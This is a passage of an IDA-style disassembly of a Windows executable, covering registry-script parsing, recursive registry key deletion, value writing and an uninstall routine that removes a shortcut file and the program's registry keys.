jz loc_402FC3
push ecx ; hKey
call ds:RegCloseKey ; RegCloseKey
mov eax, esi
pop edi
pop esi
add esp, 118h
retn 4
; ---------------------------------------------------------------------------
loc_402F20: ; CODE XREF: sub_402EA0+5C�j
lea eax, [esp+120h+ftLastWriteTime]
mov esi, ds:RegEnumKeyExA
push eax ; lpftLastWriteTime
push 0 ; lpcchClass
push 0 ; lpClass
lea edx, [esp+12Ch+cchName]
push 0 ; lpReserved
lea eax, [esp+130h+SubKey]
push edx ; lpcchName
push eax ; lpName
push 0 ; dwIndex
push ecx ; hKey
mov [esp+140h+cchName], 100h
call esi ; RegEnumKeyExA
test eax, eax
jnz short loc_402F8A
loc_402F4C: ; CODE XREF: sub_402EA0+E4�j
lea ecx, [esp+120h+SubKey]
push ecx ; lpSubKey
lea ecx, [esp+124h+hKey]
call sub_402EA0
mov edi, eax
test edi, edi
jnz short loc_402FD0
lea edx, [esp+120h+ftLastWriteTime]
lea ecx, [esp+120h+SubKey]
push edx ; lpftLastWriteTime
mov edx, [esp+124h+hKey]
push eax ; lpcchClass
push eax ; lpClass
push eax ; lpReserved
lea eax, [esp+130h+cchName]
push eax ; lpcchName
push ecx ; lpName
push edi ; dwIndex
push edx ; hKey
mov [esp+140h+cchName], 100h
call esi ; RegEnumKeyExA
test eax, eax
jz short loc_402F4C
mov edi, [esp+120h+var_10C]
loc_402F8A: ; CODE XREF: sub_402EA0+AA�j
mov eax, [esp+120h+hKey]
test eax, eax
jz short loc_402FA1
push eax ; hKey
call ds:RegCloseKey ; RegCloseKey
mov [esp+120h+hKey], 0
loc_402FA1: ; CODE XREF: sub_402EA0+F0�j
mov eax, [esp+120h+lpSubKey]
mov ecx, [edi]
push eax ; lpSubKey
push ecx ; hKey
call ds:RegDeleteKeyA ; RegDeleteKeyA
mov esi, eax
mov eax, [esp+120h+hKey]
test eax, eax
jz short loc_402FC3
push eax ; hKey
call ds:RegCloseKey ; RegCloseKey
loc_402FC3: ; CODE XREF: sub_402EA0+66�j
; sub_402EA0+11A�j
mov eax, esi
pop edi
pop esi
add esp, 118h
retn 4
; ---------------------------------------------------------------------------
loc_402FD0: ; CODE XREF: sub_402EA0+BE�j
mov eax, [esp+120h+hKey]
test eax, eax
jz short loc_402FDF
push eax ; hKey
call ds:RegCloseKey ; RegCloseKey
loc_402FDF: ; CODE XREF: sub_402EA0+136�j
mov eax, edi
pop edi
pop esi
add esp, 118h
retn 4
sub_402EA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_402FF0(int,LPCSTR lpValueName,int)
sub_402FF0 proc near ; CODE XREF: sub_402370+73B�p
; sub_402370+862�p
String1 = byte ptr -2010h
Data = byte ptr -1010h
var_10 = dword ptr -10h
pulOut = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
lpValueName = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 2010h
call sub_40AF70
push ebx
push esi
mov esi, ecx
push edi
lea edi, [ebp+String1]
mov eax, [esi]
mov cl, [eax]
push ecx
mov ecx, esi
call sub_401F80
test eax, eax
jz short loc_403031
loc_403018: ; CODE XREF: sub_402FF0+3F�j
mov edx, [esi]
push edx ; lpsz
call ds:CharNextA ; CharNextA
mov [esi], eax
mov al, [eax]
push eax
mov ecx, esi
call sub_401F80
test eax, eax
jnz short loc_403018
loc_403031: ; CODE XREF: sub_402FF0+26�j
mov ecx, [esi]
mov al, [ecx]
test al, al
jz loc_40312B
cmp al, 27h
jnz loc_40313F
push ecx ; lpsz
call ds:CharNextA ; CharNextA
mov [esi], eax
mov cl, [eax]
test cl, cl
jz short loc_4030A0
loc_403054: ; CODE XREF: sub_402FF0+AE�j
mov ecx, esi
call sub_401D20
test eax, eax
jnz short loc_4030A0
mov eax, [esi]
cmp byte ptr [eax], 27h
jnz short loc_40306F
push eax ; lpsz
call ds:CharNextA ; CharNextA
mov [esi], eax
loc_40306F: ; CODE XREF: sub_402FF0+74�j
mov ebx, [esi]
push ebx ; lpsz
call ds:CharNextA ; CharNextA
lea ecx, [edi+2]
lea edx, [ebp+Data]
cmp ecx, edx
mov [esi], eax
jnb loc_40312B
cmp ebx, eax
jnb short loc_40309B
mov ecx, ebx
loc_403091: ; CODE XREF: sub_402FF0+A9�j
mov dl, [ecx]
inc ecx
mov [edi], dl
inc edi
cmp ecx, eax
jb short loc_403091
loc_40309B: ; CODE XREF: sub_402FF0+9D�j
cmp byte ptr [eax], 0
jnz short loc_403054
loc_4030A0: ; CODE XREF: sub_402FF0+62�j
; sub_402FF0+6D�j
mov eax, [esi]
cmp byte ptr [eax], 0
jz loc_40312B
push eax ; lpsz
mov byte ptr [edi], 0
call ds:CharNextA ; CharNextA
mov [esi], eax
loc_4030B7: ; CODE XREF: sub_402FF0+17F�j
mov al, byte_40FC60
test al, 1
jnz short loc_403104
mov ecx, ds:off_40D1FC
mov edx, ds:off_40D200
or al, 1
mov word_40FBB4, 8
mov byte_40FC60, al
mov eax, ds:off_40D1F8
mov dword_40FBB0, eax
mov dword_40FBB8, ecx
mov word_40FBBC, 13h
mov dword_40FBC0, edx
mov word_40FBC4, 11h
loc_403104: ; CODE XREF: sub_402FF0+CE�j
xor ebx, ebx
mov edi, offset dword_40FBB0
loc_40310B: ; CODE XREF: sub_402FF0+139�j
mov eax, [edi]
lea ecx, [ebp+String1]
push eax ; lpString2
push ecx ; lpString1
call ds:lstrcmpiA ; lstrcmpiA
test eax, eax
jz short loc_403174
add edi, 8
inc ebx
cmp edi, offset dword_40FBC8
jl short loc_40310B
loc_40312B: ; CODE XREF: sub_402FF0+47�j
; sub_402FF0+95�j ...
mov eax, 80020009h
lea esp, [ebp-201Ch]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
; ---------------------------------------------------------------------------
loc_40313F: ; CODE XREF: sub_402FF0+4F�j
; sub_402FF0+17A�j
push eax
mov ecx, esi
call sub_401F80
test eax, eax
jnz short loc_40316C
mov ebx, [esi]
push ebx ; lpsz
call ds:CharNextA ; CharNextA
cmp ebx, eax
mov [esi], eax
jnb short loc_403166
mov ecx, ebx
loc_40315C: ; CODE XREF: sub_402FF0+174�j
mov dl, [ecx]
inc ecx
mov [edi], dl
inc edi
cmp ecx, eax
jb short loc_40315C
loc_403166: ; CODE XREF: sub_402FF0+168�j
mov al, [eax]
test al, al
jnz short loc_40313F
loc_40316C: ; CODE XREF: sub_402FF0+159�j
mov byte ptr [edi], 0
jmp loc_4030B7
; ---------------------------------------------------------------------------
loc_403174: ; CODE XREF: sub_402FF0+12D�j
mov di, word_40FBB4[ebx*8]
loc_40317C: ; CODE XREF: sub_402FF0+1B1�j
mov eax, [esi]
movsx ecx, byte ptr [eax]
add ecx, 0FFFFFFF7h
cmp ecx, 17h ; switch 24 cases
ja short loc_4031A3 ; default
; jumptable 00403191 cases 2,3,5-22
xor edx, edx
mov dl, ds:byte_403394[ecx]
jmp ds:off_40338C[edx*4] ; switch jump
loc_403198: ; DATA XREF: .text:off_40338C�o
push eax ; jumptable 00403191 cases 0,1,4,23
call ds:CharNextA ; CharNextA
mov [esi], eax
jmp short loc_40317C
; ---------------------------------------------------------------------------
loc_4031A3: ; CODE XREF: sub_402FF0+197�j
; sub_402FF0+1A1�j
; DATA XREF: ...
lea eax, [ebp+Data] ; default
; jumptable 00403191 cases 2,3,5-22
mov ecx, esi
push eax
call sub_402020
test eax, eax
jl loc_40337C
and edi, 0FFFFh
mov eax, edi
sub eax, 8
jz loc_40333D
sub eax, 9
jz short loc_40324D
sub eax, 2
jnz loc_403367
lea ecx, [ebp+Data]
test ecx, ecx
jnz short loc_4031E6
xor ebx, ebx
jmp short loc_40321F
; ---------------------------------------------------------------------------
loc_4031E6: ; CODE XREF: sub_402FF0+1F0�j
lea edx, [ebp+Data]
push edx ; lpString
call ds:lstrlenA ; lstrlenA
mov edi, eax
inc edi
lea eax, [edi+edi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov ebx, esp
push edi ; cchWideChar
push ebx ; lpWideCharStr
lea eax, [ebp+Data]
push 0FFFFFFFFh ; cbMultiByte
push eax ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
mov word ptr [ebx], 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
loc_40321F: ; CODE XREF: sub_402FF0+1F4�j
lea ecx, [ebp+pulOut]
push ecx ; pulOut
push 0 ; dwFlags
push 0 ; lcid
push ebx ; strIn
call ds:VarUI4FromStr
mov edx, [ebp+pulOut]
mov ecx, [ebp+lpValueName]
mov [ebp+var_4], edx
mov edx, [ebp+arg_0]
lea eax, [ebp+var_4]
push 4
push eax
mov eax, [edx]
push 4
push 0
push ecx
push eax
jmp loc_403361
; ---------------------------------------------------------------------------
loc_40324D: ; CODE XREF: sub_402FF0+1DD�j
lea ecx, [ebp+Data]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
test al, 1
mov [ebp+var_4], eax
jz short loc_403275
mov eax, 80004005h
lea esp, [ebp-201Ch]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
; ---------------------------------------------------------------------------
loc_403275: ; CODE XREF: sub_402FF0+26F�j
cdq
sub eax, edx
mov ebx, eax
sar ebx, 1
mov eax, ebx
mov [ebp+var_10], ebx
add eax, 3
and al, 0FCh
call sub_40AF70
mov ecx, ebx
mov edi, esp
mov edx, ecx
xor eax, eax
shr ecx, 2
mov [ebp+var_8], edi
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
mov eax, esp
test eax, eax
jnz short loc_4032BC
mov eax, 80004005h
lea esp, [ebp-201Ch]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
; ---------------------------------------------------------------------------
loc_4032BC: ; CODE XREF: sub_402FF0+2B6�j
mov eax, [ebp+var_4]
xor edi, edi
test eax, eax
jle short loc_403328
loc_4032C5: ; CODE XREF: sub_402FF0+333�j
mov al, [ebp+edi+Data]
movsx ecx, al
add ecx, 0FFFFFFD0h
cmp ecx, 36h ; switch 55 cases
ja short loc_4032F8 ; default
; jumptable 004032DF cases 10-16,23-48
xor edx, edx
mov dl, ds:byte_4033BC[ecx]
jmp ds:off_4033AC[edx*4] ; switch jump
loc_4032E6: ; DATA XREF: .text:off_4033AC�o
sub al, 30h ; jumptable 004032DF cases 0-9
mov bl, al
jmp short loc_4032FA
; ---------------------------------------------------------------------------
loc_4032EC: ; CODE XREF: sub_402FF0+2EF�j
; DATA XREF: .text:off_4033AC�o
sub al, 37h ; jumptable 004032DF cases 17-22
mov bl, al
jmp short loc_4032FA
; ---------------------------------------------------------------------------
loc_4032F2: ; CODE XREF: sub_402FF0+2EF�j
; DATA XREF: .text:off_4033AC�o
sub al, 57h ; jumptable 004032DF cases 49-54
mov bl, al
jmp short loc_4032FA
; ---------------------------------------------------------------------------
loc_4032F8: ; CODE XREF: sub_402FF0+2E5�j
; sub_402FF0+2EF�j
; DATA XREF: ...
xor bl, bl ; default
; jumptable 004032DF cases 10-16,23-48
loc_4032FA: ; CODE XREF: sub_402FF0+2FA�j
; sub_402FF0+300�j ...
mov ecx, [ebp+var_8]
mov eax, edi
cdq
sub eax, edx
mov edx, edi
sar eax, 1
and edx, 1
add eax, ecx
shl edx, 2
mov ecx, 4
sub ecx, edx
mov dl, [eax]
shl bl, cl
or dl, bl
inc edi
mov [eax], dl
mov eax, [ebp+var_4]
cmp edi, eax
jl short loc_4032C5
mov ebx, [ebp+var_10]
loc_403328: ; CODE XREF: sub_402FF0+2D3�j
mov ecx, [ebp+var_8]
mov eax, [ebp+arg_0]
mov edx, [ebp+lpValueName]
push ebx
mov eax, [eax]
push ecx
push 3
push 0
push edx
push eax
jmp short loc_403361
; ---------------------------------------------------------------------------
loc_40333D: ; CODE XREF: sub_402FF0+1D4�j
lea eax, [ebp+Data]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
mov edx, [ebp+lpValueName]
inc eax
push eax ; cbData
mov eax, [ebp+arg_0]
lea ecx, [ebp+Data]
push ecx ; lpData
mov ecx, [eax]
push 1 ; dwType
push 0 ; Reserved
push edx ; lpValueName
push ecx ; hKey
loc_403361: ; CODE XREF: sub_402FF0+258�j
; sub_402FF0+34B�j
call ds:RegSetValueExA ; RegSetValueExA
loc_403367: ; CODE XREF: sub_402FF0+1E2�j
mov edx, [ebp+arg_8]
mov ecx, esi
push edx
call sub_402020
xor ecx, ecx
test eax, eax
setnl cl
dec ecx
and eax, ecx
loc_40337C: ; CODE XREF: sub_402FF0+1C3�j
lea esp, [ebp-201Ch]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
sub_402FF0 endp
; ---------------------------------------------------------------------------
align 4
off_40338C dd offset loc_403198 ; DATA XREF: sub_402FF0+1A1�r
dd offset loc_4031A3 ; jump table for switch statement
byte_403394 db 0, 0, 1, 1 ; DATA XREF: sub_402FF0+19B�r
db 0, 1, 1, 1 ; indirect table for switch statement
db 1, 1, 1, 1
db 1, 1, 1, 1
db 1, 1, 1, 1
db 1, 1, 1, 0
off_4033AC dd offset loc_4032E6, offset loc_4032EC, offset loc_4032F2
; DATA XREF: sub_402FF0+2EF�r
dd offset loc_4032F8 ; jump table for switch statement
byte_4033BC db 0, 0, 0, 0 ; DATA XREF: sub_402FF0+2E9�r
db 0, 0, 0, 0 ; indirect table for switch statement
db 0, 0, 3, 3
db 3, 3, 3, 3
db 3, 1, 1, 1
db 1, 1, 1, 3
db 3, 3, 3, 3
db 3, 3, 3, 3
db 3, 3, 3, 3
db 3, 3, 3, 3
db 3, 3, 3, 3
db 3, 3, 3, 3
db 3, 2, 2, 2
db 2, 2, 2
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_403400(HKEY hKey)
sub_403400 proc near ; CODE XREF: sub_402370+8C8�p
; sub_402370+94F�p
cSubKeys = dword ptr -4
hKey = dword ptr 4
push ecx
push 0 ; lpftLastWriteTime
push 0 ; lpcbSecurityDescriptor
mov ecx, [esp+0Ch+hKey]
push 0 ; lpcbMaxValueLen
push 0 ; lpcbMaxValueNameLen
push 0 ; lpcValues
push 0 ; lpcbMaxClassLen
lea eax, [esp+1Ch+cSubKeys]
push 0 ; lpcbMaxSubKeyLen
push eax ; lpcSubKeys
push 0 ; lpReserved
push 0 ; lpcchClass
push 0 ; lpClass
push ecx ; hKey
mov [esp+34h+cSubKeys], 0
call ds:RegQueryInfoKeyA ; RegQueryInfoKeyA
test eax, eax
jge short loc_403437
xor eax, eax
pop ecx
retn 4
; ---------------------------------------------------------------------------
loc_403437: ; CODE XREF: sub_403400+2F�j
mov eax, [esp+4+cSubKeys]
xor edx, edx
cmp edx, eax
sbb eax, eax
neg eax
pop ecx
retn 4
sub_403400 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_403450(DWORD cchValueName)
sub_403450 proc near ; CODE XREF: sub_402370+8D7�p
cchValueName = dword ptr 4
ValueName = byte ptr 8
hKey = dword ptr 100Ch
mov eax, 1008h
call sub_40AF70
push esi
push 0 ; lpftLastWriteTime
push 0 ; lpcbSecurityDescriptor
mov esi, [esp+0Ch+hKey]
push 0 ; lpcbMaxValueLen
lea eax, [esp+10h]
push 0 ; lpcbMaxValueNameLen
push eax ; lpcValues
push 0 ; lpcbMaxClassLen
push 0 ; lpcbMaxSubKeyLen
push 0 ; lpcSubKeys
push 0 ; lpReserved
push 0 ; lpcchClass
push 0 ; lpClass
push esi ; hKey
mov dword ptr [esp+34h], 0
call ds:RegQueryInfoKeyA ; RegQueryInfoKeyA
test eax, eax
jz short loc_40349A
loc_40348E: ; CODE XREF: sub_403450+78�j
; sub_403450+80�j
xor eax, eax
pop esi
add esp, 1008h
retn 4
; ---------------------------------------------------------------------------
loc_40349A: ; CODE XREF: sub_403450+3C�j
mov eax, [esp+4]
cmp eax, 1
jnz short loc_4034E1
push 0 ; lpcbData
push 0 ; lpData
push 0 ; lpType
lea ecx, [esp+10h+cchValueName]
push 0 ; lpReserved
lea edx, [esp+14h+ValueName]
push ecx ; lpcchValueName
push edx ; lpValueName
push 0 ; dwIndex
push esi ; hKey
mov [esp+24h+cchValueName], 1000h
call ds:RegEnumValueA ; RegEnumValueA
test eax, eax
jnz short loc_40348E
mov al, [esp+4+ValueName]
test al, al
jz short loc_40348E
mov eax, 1
pop esi
add esp, 1008h
retn 4
; ---------------------------------------------------------------------------
loc_4034E1: ; CODE XREF: sub_403450+51�j
xor ecx, ecx
pop esi
cmp ecx, eax
sbb eax, eax
neg eax
add esp, 1008h
retn 4
sub_403450 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403500 proc near ; CODE XREF: sub_402370+8F9�p
; sub_402370+9E0�p
arg_1000 = dword ptr 1004h
mov eax, 1000h
call sub_40AF70
push ebx
mov ebx, [esp+4+arg_1000]
push ebp
push esi
mov al, [ebx]
push edi
cmp al, 3Dh
mov esi, ecx
jnz loc_403651
mov eax, [esi]
mov cl, [eax]
push ecx
mov ecx, esi
call sub_401F80
mov ebp, ds:CharNextA
test eax, eax
jz short loc_40354C
loc_403537: ; CODE XREF: sub_403500+4A�j
mov edx, [esi]
push edx ; lpsz
call ebp ; CharNextA
mov [esi], eax
mov al, [eax]
push eax
mov ecx, esi
call sub_401F80
test eax, eax
jnz short loc_403537
loc_40354C: ; CODE XREF: sub_403500+35�j
mov ecx, [esi]
mov al, [ecx]
test al, al
jz loc_40361C
cmp al, 27h
jnz loc_4035EA
push ecx ; lpsz
call ebp ; CharNextA
mov [esi], eax
mov cl, [eax]
test cl, cl
jz short loc_4035BA
loc_40356B: ; CODE XREF: sub_403500+B8�j
mov eax, [esi]
cmp byte ptr [eax], 27h
jnz short loc_40357A
push eax ; lpsz
call ebp ; CharNextA
cmp byte ptr [eax], 27h
jnz short loc_4035BA
loc_40357A: ; CODE XREF: sub_403500+70�j
mov eax, [esi]
cmp byte ptr [eax], 27h
jnz short loc_403586
push eax ; lpsz
call ebp ; CharNextA
mov [esi], eax
loc_403586: ; CODE XREF: sub_403500+7F�j
mov edi, [esi]
push edi ; lpsz
call ebp ; CharNextA
mov ecx, [esp+10h+arg_1000]
lea edx, [ebx+2]
add ecx, 1000h
mov [esi], eax
cmp edx, ecx
jnb short loc_40361C
cmp edi, eax
jnb short loc_4035B3
mov eax, edi
loc_4035A7: ; CODE XREF: sub_403500+B1�j
mov cl, [eax]
inc eax
mov [ebx], cl
mov ecx, [esi]
inc ebx
cmp eax, ecx
jb short loc_4035A7
loc_4035B3: ; CODE XREF: sub_403500+A3�j
mov edx, [esi]
cmp byte ptr [edx], 0
jnz short loc_40356B
loc_4035BA: ; CODE XREF: sub_403500+69�j
; sub_403500+78�j
mov eax, [esi]
cmp byte ptr [eax], 0
jz short loc_40361C
mov byte ptr [ebx], 0
mov ecx, [esi]
push ecx ; lpsz
loc_4035C7: ; CODE XREF: sub_403500+E8�j
call ebp ; CharNextA
mov [esi], eax
loc_4035CB: ; CODE XREF: sub_403500+11A�j
mov eax, [esi]
movsx ecx, byte ptr [eax]
add ecx, 0FFFFFFF7h
cmp ecx, 17h ; switch 24 cases
ja short loc_40362E ; default
; jumptable 004035E0 cases 2,3,5-22
xor edx, edx
mov dl, ds:byte_403668[ecx]
jmp ds:off_403660[edx*4] ; switch jump
loc_4035E7: ; DATA XREF: .text:off_403660�o
push eax ; jumptable 004035E0 cases 0,1,4,23
jmp short loc_4035C7
; ---------------------------------------------------------------------------
loc_4035EA: ; CODE XREF: sub_403500+5A�j
; sub_403500+115�j
push eax
mov ecx, esi
call sub_401F80
test eax, eax
jnz short loc_403617
mov edi, [esi]
push edi ; lpsz
call ebp ; CharNextA
cmp edi, eax
mov [esi], eax
jnb short loc_40360F
mov eax, edi
loc_403603: ; CODE XREF: sub_403500+10D�j
mov dl, [eax]
inc eax
mov [ebx], dl
mov ecx, [esi]
inc ebx
cmp eax, ecx
jb short loc_403603
loc_40360F: ; CODE XREF: sub_403500+FF�j
mov eax, [esi]
mov al, [eax]
test al, al
jnz short loc_4035EA
loc_403617: ; CODE XREF: sub_403500+F4�j
mov byte ptr [ebx], 0
jmp short loc_4035CB
; ---------------------------------------------------------------------------
loc_40361C: ; CODE XREF: sub_403500+52�j
; sub_403500+9F�j ...
pop edi
pop esi
pop ebp
mov eax, 80020009h
pop ebx
add esp, 1000h
retn 4
; ---------------------------------------------------------------------------
loc_40362E: ; CODE XREF: sub_403500+D6�j
; sub_403500+E0�j
; DATA XREF: ...
lea eax, [esp+10h] ; default
; jumptable 004035E0 cases 2,3,5-22
mov ecx, esi
push eax
call sub_402020
test eax, eax
jl short loc_403653
mov ecx, [esp+10h+arg_1000]
push ecx
mov ecx, esi
call sub_402020
test eax, eax
jl short loc_403653
loc_403651: ; CODE XREF: sub_403500+1B�j
xor eax, eax
loc_403653: ; CODE XREF: sub_403500+13C�j
; sub_403500+14F�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 1000h
retn 4
sub_403500 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
off_403660 dd offset loc_4035E7 ; DATA XREF: sub_403500+E0�r
dd offset loc_40362E ; jump table for switch statement
byte_403668 db 0, 0, 1, 1 ; DATA XREF: sub_403500+DA�r
db 0, 1, 1, 1 ; indirect table for switch statement
db 1, 1, 1, 1
db 1, 1, 1, 1
db 1, 1, 1, 1
db 1, 1, 1, 0
; =============== S U B R O U T I N E =======================================
sub_403680 proc near ; CODE XREF: sub_4010C0+3A4�p
mov eax, ecx
xor ecx, ecx
mov [eax+4], ecx
mov [eax+18h], ecx
retn
sub_403680 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_403690(int,LPCSTR lpsz)
sub_403690 proc near ; CODE XREF: sub_4010C0+141�p
; sub_4010C0+17A�p
arg_0 = dword ptr 4
lpsz = dword ptr 8
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
test esi, esi
jz short loc_4036CA
mov ebx, [esp+0Ch+lpsz]
mov edi, ds:CharNextA
loc_4036A5: ; CODE XREF: sub_403690+38�j
cmp byte ptr [esi], 0
jz short loc_4036CA
test ebx, ebx
mov eax, ebx
jz short loc_4036C1
loc_4036B0: ; CODE XREF: sub_403690+2F�j
mov cl, [eax]
test cl, cl
jz short loc_4036C1
cmp [esi], cl
jz short loc_4036D0
push eax ; lpsz
call edi ; CharNextA
test eax, eax
jnz short loc_4036B0
loc_4036C1: ; CODE XREF: sub_403690+1E�j
; sub_403690+24�j
push esi ; lpsz
call edi ; CharNextA
mov esi, eax
test esi, esi
jnz short loc_4036A5
loc_4036CA: ; CODE XREF: sub_403690+9�j
; sub_403690+18�j
pop edi
pop esi
xor eax, eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4036D0: ; CODE XREF: sub_403690+28�j
push esi ; lpsz
call edi ; CharNextA
pop edi
pop esi
pop ebx
retn
sub_403690 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4036E0(HINSTANCE hInstance)
sub_4036E0 proc near ; CODE XREF: sub_4010C0+37A�p
var_B38 = byte ptr -0B38h
FileName = byte ptr -738h
String = byte ptr -338h
Data = byte ptr -138h
bstrString = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_E = byte ptr -0Eh
Type = dword ptr -0Ch
hKey = dword ptr -8
cbData = dword ptr -4
hInstance = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0B38h
mov ecx, [ebp+hInstance]
push ebx
push esi
push edi
lea eax, [ebp+String]
push 200h ; cchBufferMax
push eax ; lpBuffer
xor ebx, ebx
push 71h ; uID
push ecx ; hInstance
mov [ebp+bstrString], ebx
mov [ebp+var_34], ebx
mov [ebp+var_30], ebx
mov [ebp+var_2C], bl
mov [ebp+var_E], bl
call ds:LoadStringA ; LoadStringA
mov edx, [ebp+bstrString]
mov esi, eax
push edx ; bstrString
call ds:SysFreeString
cmp esi, ebx
jz short loc_40377E
lea eax, [ebp+String]
test eax, eax
jnz short loc_40373D
xor edi, edi
push edi ; psz
call ds:SysAllocString
mov [ebp+bstrString], eax
jmp short loc_403781
; ---------------------------------------------------------------------------
loc_40373D: ; CODE XREF: sub_4036E0+4D�j
lea ecx, [ebp+String]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov edi, esp
push esi ; cchWideChar
push edi ; lpWideCharStr
lea edx, [ebp+String]
push 0FFFFFFFFh ; cbMultiByte
push edx ; lpMultiByteStr
push ebx ; dwFlags
push ebx ; CodePage
mov [edi], bx
call ds:MultiByteToWideChar ; MultiByteToWideChar
push edi ; psz
call ds:SysAllocString
mov [ebp+bstrString], eax
jmp short loc_403781
; ---------------------------------------------------------------------------
loc_40377E: ; CODE XREF: sub_4036E0+43�j
mov [ebp+bstrString], ebx
loc_403781: ; CODE XREF: sub_4036E0+5B�j
; sub_4036E0+9C�j
mov eax, offset MultiByteStr ; "\\"
test eax, eax
jnz short loc_40378E
xor edi, edi
jmp short loc_4037BF
; ---------------------------------------------------------------------------
loc_40378E: ; CODE XREF: sub_4036E0+A8�j
push offset MultiByteStr ; "\\"
call ds:lstrlenA ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov edi, esp
push esi ; cchWideChar
push edi ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push offset MultiByteStr ; "\\"
push ebx ; dwFlags
push ebx ; CodePage
mov [edi], bx
call ds:MultiByteToWideChar ; MultiByteToWideChar
loc_4037BF: ; CODE XREF: sub_4036E0+AC�j
push edi ; lpString
call ds:lstrlenW ; lstrlenW
push eax
push edi
lea ecx, [ebp+bstrString]
call sub_403920
mov ecx, [ebp+hInstance]
push 7Ah ; bstrString
push ecx ; hInstance
lea ecx, [ebp+bstrString]
call sub_40A840
lea edx, [ebp+hKey]
lea ecx, [ebp+bstrString]
push edx ; phkResult
push 20019h ; samDesired
push ebx ; ulOptions
call sub_40A2D0
push eax ; lpSubKey
push 80000001h ; hKey
call ds:RegOpenKeyExA ; RegOpenKeyExA
test eax, eax
jnz loc_4038D4
mov edx, [ebp+hKey]
mov esi, ds:RegQueryValueExA
lea eax, [ebp+cbData]
lea ecx, [ebp+Type]
push eax ; lpcbData
push ebx ; lpData
push ecx ; lpType
push ebx ; lpReserved
push offset ValueName ; "uninstExe"
push edx ; hKey
call esi ; RegQueryValueExA
test eax, eax
jnz short loc_403864
lea eax, [ebp+cbData]
lea ecx, [ebp+Data]
push eax ; lpcbData
mov eax, [ebp+hKey]
lea edx, [ebp+Type]
push ecx ; lpData
push edx ; lpType
push ebx ; lpReserved
push offset ValueName ; "uninstExe"
push eax ; hKey
call esi ; RegQueryValueExA
mov ecx, [ebp+cbData]
lea edx, [ebp+Data]
push ecx
lea eax, [ebp+var_B38]
push edx
push eax
call sub_40B070
mov ecx, [ebp+cbData]
add esp, 0Ch
mov [ebp+ecx+var_B38], bl
jmp short loc_40386A
; ---------------------------------------------------------------------------
loc_403864: ; CODE XREF: sub_4036E0+141�j
mov [ebp+var_B38], bl
loc_40386A: ; CODE XREF: sub_4036E0+182�j
mov ecx, [ebp+hKey]
lea edx, [ebp+cbData]
push edx ; lpcbData
lea eax, [ebp+Type]
push ebx ; lpData
push eax ; lpType
push ebx ; lpReserved
push offset aUninstshortcut ; "uninstShortcut"
push ecx ; hKey
call esi ; RegQueryValueExA
test eax, eax
jnz short loc_4038C4
lea edx, [ebp+cbData]
lea eax, [ebp+Data]
push edx ; lpcbData
mov edx, [ebp+hKey]
lea ecx, [ebp+Type]
push eax ; lpData
push ecx ; lpType
push ebx ; lpReserved
push offset aUninstshortcut ; "uninstShortcut"
push edx ; hKey
call esi ; RegQueryValueExA
mov eax, [ebp+cbData]
lea ecx, [ebp+Data]
push eax
lea edx, [ebp+FileName]
push ecx
push edx
call sub_40B070
mov eax, [ebp+cbData]
add esp, 0Ch
mov [ebp+eax+FileName], bl
jmp short loc_4038CA
; ---------------------------------------------------------------------------
loc_4038C4: ; CODE XREF: sub_4036E0+1A1�j
mov [ebp+FileName], bl
loc_4038CA: ; CODE XREF: sub_4036E0+1E2�j
mov ecx, [ebp+hKey]
push ecx ; hKey
call ds:RegCloseKey ; RegCloseKey
loc_4038D4: ; CODE XREF: sub_4036E0+11E�j
lea edi, [ebp+FileName]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
jz short loc_4038F3
lea edx, [ebp+FileName]
push edx ; lpFileName
call ds:DeleteFileA ; DeleteFileA
loc_4038F3: ; CODE XREF: sub_4036E0+204�j
lea ecx, [ebp+bstrString]
call sub_40A2D0
mov esi, ds:RegDeleteKeyA
push eax ; lpSubKey
push 80000001h ; hKey
call esi ; RegDeleteKeyA
push offset SubKey ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h ; hKey
call esi ; RegDeleteKeyA
push ebx ; uExitCode
call sub_40AF9F
nop
nop
nop
nop
nop
sub_4036E0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_403920 proc near ; CODE XREF: sub_4036E0+EB�p
; sub_4039C0+141�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ecx
push ebx
push ebp
mov ebp, ecx
push esi
mov eax, [ebp+0]
test eax, eax
jnz short loc_403931
xor esi, esi
jmp short loc_40393A
; ---------------------------------------------------------------------------
